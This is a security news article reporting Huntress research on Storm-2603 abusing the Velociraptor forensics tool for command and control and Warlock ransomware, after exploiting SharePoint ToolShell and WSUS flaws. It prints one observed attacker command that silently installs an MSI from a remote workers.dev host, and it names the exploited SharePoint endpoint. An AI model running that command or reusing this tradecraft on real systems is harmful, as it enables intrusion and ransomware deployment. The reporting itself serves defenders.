Legitimate administrative tools are increasingly becoming the weapon of choice for sophisticated threat actors aiming to blend in with normal network activity.
A recent campaign has highlighted this dangerous trend, where attackers are weaponizing Velociraptor, a widely respected Digital Forensics and Incident Response (DFIR) tool.
By deploying this software, adversaries effectively establish stealthy Command and Control (C2) channels, allowing them to execute arbitrary commands and maintain persistent access to compromised environments without triggering traditional security alarms.
The attacks, observed throughout late 2025, leverage critical vulnerabilities in widely used enterprise infrastructure, specifically targeting Windows Server Update Services (WSUS) and Microsoft SharePoint.
Once inside, the actors deploy Velociraptor to facilitate lateral movement and, in confirmed cases, deliver the Warlock ransomware.
This dual-use strategy complicates detection, as the presence of forensic tools often signals remediation rather than active compromise.
Huntress security analysts identified this evolving tradecraft after investigating three distinct incidents between September and November.
Their research linked specific indicators, such as the hostname DESKTOP-C1N9M, to the financially motivated threat cluster Storm-2603.
The attackers demonstrated a high level of operational security, utilizing Cloudflare tunnels and digitally signed binaries to bypass endpoint defenses and evade network blocklists.
Exploiting SharePoint for Stealthy Access
The infection chain prominently features the exploitation of the “ToolShell” vulnerability chain in Microsoft SharePoint.
Attackers first bypass authentication using CVE-2025-49706 by sending specially crafted HTTP POST requests to /_layouts/15/ToolPane.aspx. Following this, they chain a secondary remote code execution vulnerability (CVE-2025-49704) to modify default files like start.aspx into malicious web shells.
.webp "Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery 3")
This illustrates the suspicious IIS logs revealing these unauthorized requests within the /_layouts/15/ directory.
Once the web shell is active, the threat actors execute commands to download and install Velociraptor via Windows Installer. A typical command observed in these attacks is:
msiexec /q /i https://royal-boat-bf05.qgtxtebl.workers.dev/v3.msi
This installation registers Velociraptor as a system service, ensuring persistence across reboots. Besides this, the Autorun depicts the creation of this autorun service.
.webp "Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery 4")
To further entrench their position, the attackers use the compromised Velociraptor instance to run Base64 encoded PowerShell commands.
These scripts download Visual Studio Code (code.exe) to create outbound tunnels, effectively masking their malicious traffic within legitimate development activity.
.webp "Hackers Leverage Velociraptor DFIR Tool for Stealthy C2 & Ransomware Delivery 5")
The VS Code logs highlight the events generated during this tunnel-creation process, showing how the actors pivot from forensic tool abuse to complete network domination.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
